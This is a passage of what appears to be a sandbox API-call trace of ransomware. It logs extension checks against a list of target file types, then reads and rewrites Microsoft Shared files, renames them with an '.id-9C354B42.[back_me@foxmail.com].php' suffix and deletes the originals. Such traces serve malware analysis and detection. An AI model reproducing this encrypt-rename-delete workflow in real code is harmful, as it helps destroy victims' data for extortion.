lpString2=".EXE") returned 1 [0055.373] lstrlenW (lpString=".xlsx") returned 5 [0055.373] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0055.373] lstrlenW (lpString=".ppt") returned 4 [0055.373] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0055.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.373] lstrlenW (lpString=".zip") returned 4 [0055.373] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0055.373] lstrlenW (lpString=".rar") returned 4 [0055.373] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0055.373] lstrlenW (lpString=".bz2") returned 4 [0055.373] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0055.373] lstrlenW (lpString=".7z") returned 3 [0055.373] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0055.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.373] lstrlenW (lpString=".dbf") returned 4 [0055.373] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0055.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.373] lstrlenW (lpString=".1cd") returned 4 [0055.373] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0055.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.373] lstrlenW (lpString=".jpg") returned 4 [0055.373] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0055.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.373] lstrlenW (lpString=".doc") returned 4 [0055.373] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0055.373] lstrlenW (lpString=".docx") returned 5 [0055.373] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0055.373] lstrlenW (lpString=".pdf") returned 4 [0055.374] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0055.374] lstrlenW (lpString=".xls") returned 4 [0055.374] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0055.374] lstrlenW (lpString=".xlsx") returned 5 [0055.374] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0055.374] lstrlenW (lpString=".ppt") returned 4 [0055.374] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0055.374] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.374] lstrlenW (lpString=".zip") returned 4 [0055.374] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0055.374] lstrlenW (lpString=".rar") returned 4 [0055.374] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0055.374] lstrlenW (lpString=".bz2") returned 4 [0055.374] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0055.374] lstrlenW (lpString=".7z") returned 3 [0055.374] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0055.374] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.374] lstrlenW (lpString=".dbf") returned 4 [0055.374] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0055.374] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.374] lstrlenW (lpString=".1cd") returned 4 [0055.374] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0055.374] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0055.374] lstrlenW (lpString=".jpg") returned 4 [0055.374] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0055.374] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0055.375] lstrlenW (lpString="VISFILT.DLL") returned 11 [0055.375] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.883] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=2124664) returned 1 [0055.884] CloseHandle (hObject=0x21c) returned 1 [0055.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll")) returned 0x20 [0055.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0055.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0055.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.885] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0055.885] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.885] ReadFile (in: hFile=0x21c, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.908] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.908] ReadFile (in: hFile=0x21c, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.922] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0055.922] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.922] ReadFile (in: hFile=0x21c, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0056.096] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.096] WriteFile (in: hFile=0x21c, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0056.112] SetEndOfFile (hFile=0x21c) returned 1 [0056.113] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0056.119] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0056.119] WriteFile (in: hFile=0x21c, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0056.121] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0056.121] WriteFile (in: hFile=0x21c, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0056.123] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0056.123] WriteFile (in: hFile=0x21c, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0056.125] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0056.125] CloseHandle (hObject=0x21c) returned 1 [0056.126] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.126] lstrlenW (lpString=".doc") returned 4 [0056.126] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.126] lstrlenW (lpString=".docx") returned 5 [0056.126] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0056.126] lstrlenW (lpString=".pdf") returned 4 [0056.127] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.127] lstrlenW (lpString=".xls") returned 4 [0056.127] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.127] lstrlenW (lpString=".xlsx") returned 5 [0056.127] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0056.127] lstrlenW (lpString=".ppt") returned 4 [0056.127] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.127] lstrlenW (lpString=".zip") returned 4 [0056.127] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.127] lstrlenW (lpString=".rar") returned 4 [0056.127] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.127] lstrlenW (lpString=".bz2") returned 4 [0056.127] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.127] lstrlenW (lpString=".7z") returned 3 [0056.127] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.127] lstrlenW (lpString=".dbf") returned 4 [0056.127] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.127] lstrlenW (lpString=".1cd") returned 4 [0056.127] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.127] lstrlenW (lpString=".jpg") returned 4 [0056.127] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.128] lstrlenW (lpString=".doc") returned 4 [0056.128] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.128] lstrlenW (lpString=".docx") returned 5 [0056.128] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0056.128] lstrlenW (lpString=".pdf") returned 4 [0056.128] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.128] lstrlenW (lpString=".xls") returned 4 [0056.128] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.128] lstrlenW (lpString=".xlsx") returned 5 [0056.128] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0056.128] lstrlenW (lpString=".ppt") returned 4 [0056.128] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.128] lstrlenW (lpString=".zip") returned 4 [0056.128] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.128] lstrlenW (lpString=".rar") returned 4 [0056.128] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.128] lstrlenW (lpString=".bz2") returned 4 [0056.128] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.128] lstrlenW (lpString=".7z") returned 3 [0056.128] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.128] lstrlenW (lpString=".dbf") returned 4 [0056.129] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.129] lstrlenW (lpString=".1cd") returned 4 [0056.129] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0056.129] lstrlenW (lpString=".jpg") returned 4 [0056.129] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.129] lstrcmpiW (lpString1=".FLT", lpString2=".php") returned -1 [0056.129] lstrlenW (lpString="GIFIMP32.FLT") returned 12 [0056.129] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.037] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=320384) returned 1 [0057.037] CloseHandle (hObject=0x230) returned 1 [0057.037] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 0x20 [0057.037] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0057.037] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.038] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.038] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0057.038] GetLastError () returned 0x0 [0057.038] ReadFile (in: hFile=0x230, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x4e380, lpOverlapped=0x0) returned 1 [0057.046] WriteFile (in: hFile=0x228, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x4e390, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x4e390, lpOverlapped=0x0) returned 1 [0057.052] ReadFile (in: hFile=0x230, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.052] WriteFile (in: hFile=0x228, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.052] SetEndOfFile (hFile=0x228) returned 1 [0057.053] CloseHandle (hObject=0x228) returned 1 [0057.053] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.053] SetEndOfFile (hFile=0x230) returned 1 [0057.056] CloseHandle (hObject=0x230) returned 1 [0057.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0057.057] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 1 [0057.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.057] lstrlenW (lpString=".doc") returned 4 [0057.057] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0057.057] lstrlenW (lpString=".docx") returned 5 [0057.057] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0057.057] lstrlenW (lpString=".pdf") returned 4 [0057.057] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0057.057] lstrlenW (lpString=".xls") returned 4 [0057.057] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0057.057] lstrlenW (lpString=".xlsx") returned 5 [0057.057] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0057.057] lstrlenW (lpString=".ppt") returned 4 [0057.057] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0057.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.057] lstrlenW (lpString=".zip") returned 4 [0057.057] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0057.058] lstrlenW (lpString=".rar") returned 4 [0057.058] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0057.058] lstrlenW (lpString=".bz2") returned 4 [0057.058] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0057.058] lstrlenW (lpString=".7z") returned 3 [0057.058] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.058] lstrlenW (lpString=".dbf") returned 4 [0057.058] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.058] lstrlenW (lpString=".1cd") returned 4 [0057.058] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.058] lstrlenW (lpString=".jpg") returned 4 [0057.058] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.058] lstrlenW (lpString=".doc") returned 4 [0057.058] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0057.058] lstrlenW (lpString=".docx") returned 5 [0057.058] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0057.058] lstrlenW (lpString=".pdf") returned 4 [0057.058] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0057.058] lstrlenW (lpString=".xls") returned 4 [0057.058] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0057.058] lstrlenW (lpString=".xlsx") returned 5 [0057.058] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0057.058] lstrlenW (lpString=".ppt") returned 4 [0057.058] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0057.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.059] lstrlenW (lpString=".zip") returned 4 [0057.059] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0057.059] lstrlenW (lpString=".rar") returned 4 [0057.059] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0057.059] lstrlenW (lpString=".bz2") returned 4 [0057.059] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0057.059] lstrlenW (lpString=".7z") returned 3 [0057.059] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0057.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.059] lstrlenW (lpString=".dbf") returned 4 [0057.059] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0057.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.059] lstrlenW (lpString=".1cd") returned 4 [0057.059] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0057.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0057.059] lstrlenW (lpString=".jpg") returned 4 [0057.059] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0057.059] lstrcmpiW (lpString1=".CGM", lpString2=".php") returned -1 [0057.059] lstrlenW (lpString="MS.CGM") returned 6 [0057.059] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.060] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=1908) returned 1 [0057.060] CloseHandle (hObject=0x230) returned 1 [0057.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 0x20 [0057.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0057.060] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.060] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.060] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.060] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0057.060] GetLastError () returned 0x0 [0057.060] ReadFile (in: hFile=0x230, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x774, lpOverlapped=0x0) returned 1 [0057.062] WriteFile (in: hFile=0x228, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x780, lpOverlapped=0x0) returned 1 [0057.063] ReadFile (in: hFile=0x230, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.063] WriteFile (in: hFile=0x228, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0057.063] SetEndOfFile (hFile=0x228) returned 1 [0057.063] CloseHandle (hObject=0x228) returned 1 [0057.063] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.063] SetEndOfFile (hFile=0x230) returned 1 [0057.064] CloseHandle (hObject=0x230) returned 1 [0057.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0057.064] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common 